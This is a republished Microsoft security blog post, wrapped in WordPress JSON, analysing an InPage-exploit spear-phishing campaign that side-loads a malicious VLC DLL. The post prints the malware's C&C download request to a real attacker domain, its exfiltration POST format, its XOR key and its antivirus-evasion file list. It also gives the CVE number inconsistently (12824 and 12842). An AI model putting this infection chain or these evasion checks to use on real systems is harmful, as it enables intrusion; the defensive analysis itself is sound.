{"id":13790,"date":"2018-11-08T11:01:45","date_gmt":"2018-11-08T19:01:45","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/11\/08\/news-7557\/"},"modified":"2018-11-08T11:01:45","modified_gmt":"2018-11-08T19:01:45","slug":"news-7557","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/11\/08\/news-7557\/","title":{"rendered":"Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets"},"content":{"rendered":"<p><strong>Credit to Author: Windows Defender ATP| Date: Thu, 08 Nov 2018 18:08:13 +0000<\/strong><\/p>\n<p>Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic.<\/p>\n<p>&#10;<\/p>\n<p>More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-86479\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets.png\" alt=\"\" width=\"800\" height=\"470\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets.png 995w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-300x176.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-768x452.png 768w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-330x194.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-800x470.png 800w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-400x235.png 400w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><em>Figure 1. Geographic distribution of targets<\/em><\/p>\n<p>&#10;<\/p>\n<p>In the past, researchers at <a href=\"https:\/\/researchcenter.paloaltonetworks.com\/2017\/11\/unit42-recent-inpage-exploits-lead-multiple-malware-families\/\">Palo Alto<\/a> and <a href=\"https:\/\/www.kaspersky.com\/blog\/inpage-exploit\/6292\/\">Kaspersky<\/a> have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.<\/p>\n<p>&#10;<\/p>\n<p>The Office 365 Research and Response team discovered this type of targeted attack in June. The attack was orchestrated using the following approach:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li>Spear-phishing email with a malicious InPage document with the file name <em>hafeez saeed speech on 22nd April.inp<\/em> was sent to the intended victims<\/li>\n<p>&#10;<\/p>\n<li>The malicious document, which contained exploit code for <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-12824\">CVE-2017-12824<\/a>, a buffer-overflow vulnerability in InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking<\/li>\n<p>&#10;<\/p>\n<li>The side-loaded malicious DLL called back to a command-and-control (C&amp;C) site, which triggered the download and execution of the final malware encoded in a JPEG file format<\/li>\n<p>&#10;<\/p>\n<li>The final malware allowed attackers to remotely execute arbitrary command on the compromised machine<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-86482\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain.png\" alt=\"\" width=\"800\" height=\"479\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain.png 1000w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-300x180.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-768x460.png 768w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-330x198.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-800x479.png 800w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-400x240.png 400w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 2. Attack infection chain<\/em><\/p>\n<p>&#10;<\/p>\n<p><a href=\"https:\/\/products.office.com\/en-us\/exchange\/online-email-threat-protection?ocid=cx-blog-mmpc\">Office 365 Advanced Threat Protection<\/a> (ATP) protects customers from this attack by detecting the malicious InPage attachment in spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.<\/p>\n<p>&#10;<\/p>\n<p>Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as <a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">Windows Defender ATP<\/a> and <a href=\"https:\/\/azure.microsoft.com\/en-us\/features\/azure-advanced-threat-protection\/\">Azure ATP<\/a>. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detects the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in <a href=\"https:\/\/techcommunity.microsoft.com\/t5\/Security-Privacy-and-Compliance\/Announcing-Microsoft-Threat-Protection\/ba-p\/262783\">Microsoft Threat Protection<\/a>, detection and remediation are orchestrated across our solutions.<\/p>\n<p>&#10;<\/p>\n<h2>Entry point: Malicious InPage document<\/h2>\n<p>&#10;<\/p>\n<p>An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12842, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes a shellcode that decrypts and executes an embedded malicious DLL file. The decryption routine is a simple XOR function that uses the decryption key <em>&#8220;27729984h&#8221;<\/em>.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86485\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function.png\" alt=\"\" width=\"690\" height=\"481\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function.png 690w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-300x209.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-330x230.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-400x279.png 400w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><em>Figure 3. First DLL decryption function<\/em><\/p>\n<p>&#10;<\/p>\n<h2>Stage 1: DLL side-loading and C&amp;C communication<\/h2>\n<p>&#10;<\/p>\n<p>The decrypted malicious DLL contains two files embedded in the PE resources section. The first resource file is named <em>200<\/em>, which is a legitimate version of VLC media player (Product Version: 2.2.1.0, File Version: 2.2.1). The second file in the resources section is named <em>400<\/em>, which is a DLL hijacker that impersonates the legitimate file <em>Libvlc.dll<\/em>.<\/p>\n<p>&#10;<\/p>\n<p>When run, the stage 1 malware drops both the VLC media player executable and the malicious <em>Libvlc.dll<\/em> in <em>%TEMP%<\/em> folder, and then runs the VLC media player process.<\/p>\n<p>&#10;<\/p>\n<p>The vulnerable VLC media player process searches for the dropped file <em>Libvlc.dll<\/em> in the directory from which it was loaded. It subsequently picks up and loads the malicious DLL and executes its malicious function.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86488\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll.png\" alt=\"\" width=\"499\" height=\"276\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll.png 499w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-300x166.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-330x183.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-400x221.png 400w\" sizes=\"auto, (max-width: 499px) 100vw, 499px\" \/><em>Figure 4. Functions exported by the malicious Libvlc.dll<\/em><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86491\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll.png\" alt=\"\" width=\"665\" height=\"352\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll.png 665w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-300x159.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-330x175.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-400x212.png 400w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><em>Figure 5. Functions imported from Libvlc.dll by the VLC media player process<\/em><\/p>\n<p>&#10;<\/p>\n<p>The most interesting malicious code in Libvlc.dll is in the function <em>libvlc_wait()<\/em>. The malicious code dynamically resolves the API calls to connect to the attacker C&amp;C server and download a JPEG file. If the C&amp;C server is not reachable, the malware calls the API <em>sleep() for five seconds<\/em> and attempts to call back the attacker domain again.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86494\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function.png\" alt=\"\" width=\"496\" height=\"348\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function.png 496w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-300x210.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-330x232.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-400x281.png 400w\" sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><em>Figure 6. C&amp;C callback in malicious function libvlc_wait()<\/em><\/p>\n<p>&#10;<\/p>\n<p>If the JPEG file, <em>logo.jpg<\/em>, is successfully downloaded, the malicious code in <em>libvlc_wait()<\/em> skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. The code in JPEG file is encoded using <em>Shikata ga nai<\/em>, a custom polymorphic shellcode encoder\/decoder.<\/p>\n<p>&#10;<\/p>\n<p>Below an example of HTTP request sent to the C&amp;C to download the malicious file <em>logo.jpg<\/em>.<\/p>\n<p>&#10;<\/p>\n<pre>GET \/assets\/vnc\/logo.jpg HTTP\/1.1&#13;&#10;Accept: *\/*&#13;&#10;Host: useraccount.co&#13;&#10;&#13;&#10;HTTP\/1.1 200 OK&#13;&#10;Date: Mon, 09 Jul 2018 13:45:49 GMT&#13;&#10;Server: Apache\/2.4.33 (cPanel) OpenSSL\/1.0.2o mod_bwlimited\/1.4 Phusion_Passenger\/5.1.12&#13;&#10;Upgrade: h2,h2c&#13;&#10;Connection: Upgrade&#13;&#10;Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT&#13;&#10;ETag: \"26e0378-2086b-56965397b5c31\"&#13;&#10;Accept-Ranges: bytes&#13;&#10;Content-Length: 133227&#13;&#10;Content-Type: image\/jpeg<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 7. HTTP GET Request embedded in the JPEG File<\/em><\/p>\n<p>&#10;<\/p>\n<p>The historical Whois record indicated that the C&amp;C server was registered on March 20, 2018.<\/p>\n<p>&#10;<\/p>\n<pre>Domain Name: useraccount.co&#13;&#10;Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR&#13;&#10;Registrar WHOIS Server:&#13;&#10;Registrar URL: whois.publicdomainregistry.com&#13;&#10;Updated Date: 2018-03-20T14:04:40Z&#13;&#10;Creation Date: 2018-03-20T14:04:40Z&#13;&#10;Registry Expiry Date: 2019-03-20T14:04:40Z&#13;&#10;Domain Status: clientTransferProhibited https:\/\/icann.org\/epp#clientTransferProhibited&#13;&#10;Domain Status: addPeriod https:\/\/icann.org\/epp#addPeriod<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 8. Whois record for the attacker C&amp;C server.<\/em><\/p>\n<p>&#10;<\/p>\n<p>The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. After successfully decrypting the payload, it drops and executes the final DLL malware <em>aflup64.dll<\/em> in the folder <em>%ProgramData%Dell64<\/em>.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86503\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg.png\" alt=\"\" width=\"574\" height=\"203\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg.png 574w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-300x106.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-330x117.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-400x141.png 400w\" sizes=\"auto, (max-width: 574px) 100vw, 574px\" \/><br \/>&#10;<em>Figure 9. The first 29 Bytes of the JPEG file after the header make up the first decryption layer<\/em><\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86506\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code.png\" alt=\"\" width=\"624\" height=\"185\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code.png 624w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-300x89.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-330x98.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-400x119.png 400w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><em>Figure 10. Valid JPEG file header followed by encrypted malicious code<\/em><\/p>\n<p>&#10;<\/p>\n<h2>Stage 2: System reconnaissance and executing attacker commands<\/h2>\n<p>&#10;<\/p>\n<p>The final stage malware maintains persistence using different methods. For example, the malicious function <em>IntRun()<\/em> can load and execute the malware DLL. It also uses the registry key <em>CurrentVersionRun<\/em> to maintain persistence.<\/p>\n<p>&#10;<\/p>\n<p>The malwares capabilities include:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li>System reconnaissance&#10;\n<ul>&#10;<\/p>\n<li>List computer names, Windows version, Machine ID, running processes, and loaded modules<\/li>\n<p>&#10;<\/p>\n<li>List system files and directories<\/li>\n<p>&#10;<\/p>\n<li>List network configuration<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/li>\n<p>&#10;<\/p>\n<li>Execute attacker commands<\/li>\n<p>&#10;<\/p>\n<li>Evade certain sandboxes or antivirus products<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<p>Collected information or responses to commands are sent back to the attacker domain via an HTTP post request. The request has a custom header that always starts with 37 hardcoded alphanumeric characters.<\/p>\n<p>&#10;<\/p>\n<pre>---------------------n9mc4jh3ft7327hfg78kb41b861ft18bhfb91&#13;&#10;Content-Disposition: form-data; name=\"id\";&#13;&#10;Content-Type: text\/plain&#13;&#10;&lt;Base64 Data Blob&gt;<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 11. Sample of malware POST request<\/em><\/p>\n<p>&#10;<\/p>\n<p>The malware also has a list of hardcoded file names of security products and sandbox solutions. If these files are present in a machine the malware attempts to infect, it exists:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li><em>avgnt.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>avp.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>egui.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>Sbie.dll<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>VxKernelSvcNT.log<\/em><\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<h2>Detecting targeted attacks with Office 365 ATP and Windows Defender ATP<\/h2>\n<p>&#10;<\/p>\n<p>Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, theres a wide range of possibilities.<\/p>\n<p>&#10;<\/p>\n<p>Enterprises can protect themselves from targeted attacks using <a href=\"https:\/\/products.office.com\/en-us\/exchange\/online-email-threat-protection?ocid=cx-blog-mmpc\">Office 365 Advanced Threat Protection<\/a>, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging sandboxing and time-of-click protection. Recent <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/10\/17\/how-office-365-learned-to-reel-in-phish\/\">enhancements in anti-phishing capabilities<\/a> in Office 365 address impersonation, spoof, phishing content, and internal phishing emails sent from compromised accounts. If you are not already secured against advanced cyberthreat campaigns via email, <strong><a href=\"https:\/\/portal.office.com\/signup\/logout?OfferId=101bde18-5ffb-4d79-a47b-f5b2c62525b3&amp;dl=ENTERPRISEPREMIUM&amp;culture=en-US&amp;country=US\">begin a free Office 365 E5 trial<\/a> <\/strong>today.<\/p>\n<p>&#10;<\/p>\n<p>In addition, enterprises can use <a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">Windows Defender Advanced Threat Protection<\/a>, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection r<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-attack-surface-reduction\">educe the attack surface<\/a>. <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-antivirus\/windows-defender-antivirus-in-windows-10\">Windows Defender Antivirus<\/a> detects and blocks the malicious documents and files used in this campaign. Windows Defender ATPs <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-endpoint-detection-response\">endpoint detection and response<\/a>, <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/automated-investigations-windows-defender-advanced-threat-protection\">automated investigation and remediation<\/a>, and <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-hunting-windows-defender-advanced-threat-protection\">advanced hunting<\/a> capabilities empower security operations personnel to detect and stop attacks in enterprise networks. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, <strong><a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">sign up for a free Windows Defender ATP trial<\/a><\/strong>.<\/p>\n<p>&#10;<\/p>\n<p>These two services integrate with the rest of Microsofts security technologies as part of the Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/09\/24\/delivering-security-innovation-that-puts-microsofts-experience-to-work-for-you\/\">Cybersecurity is the central challenge of our digital age<\/a>, and Microsoft doesnt stop innovating to provide industry-best integrated security. For more information, read the blog post <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/09\/24\/delivering-security-innovation-that-puts-microsofts-experience-to-work-for-you\/\">Delivering security innovation that puts Microsofts experience to work for you<\/a>.<\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<p><em><strong>Ahmed Shosha<\/strong> and <strong>Abhijeet Hatekar<\/strong><\/em><br \/>&#10;<em>Microsoft Threat Intelligence Center<\/em><\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<p>&nbsp;<\/p>\n<p>&#10;<\/p>\n<h3>Indictors of Compromise (IoCs)<\/h3>\n<p>&#10;<\/p>\n<p>URLs<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/vnc\/logo[.]jpg<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/vnc\/rest[.]php<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/kvx\/success[.]txt<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/pqs\/rest[.]php<\/p>\n<p>&#10;<\/p>\n<p>Files (SHA-256)<br \/>&#10;013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP File)<br \/>&#10;9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)<br \/>&#10;019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)<\/p>\n<p>&#10;<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\">Microsoft Secure<\/a>.<\/p>\n<p><a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\" target=\"bwo\" >https:\/\/blogs.technet.microsoft.com\/mmpc\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Windows Defender ATP| Date: Thu, 08 Nov 2018 18:08:13 +0000<\/strong><\/p>\n<p>Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic. More than 75% of <\/p>\n<p><a class=\"read-more\" title=\"Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets\" aria-label=\"Read more about Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Read more<\/a><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\">Microsoft Secure<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10759,10378],"tags":[20095,4500,20096,18372,12191,10865,17194],"class_list":["post-13790","post","type-post","status-publish","format-standard","hentry","category-microsoft","category-security","tag-cve-2017-12842","tag-cybersecurity","tag-inpage","tag-office-365-atp","tag-targeted-attacks","tag-windows-defender-atp","tag-windows-defender-av"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13790","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13790"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13790\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13790"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13790"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13790"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}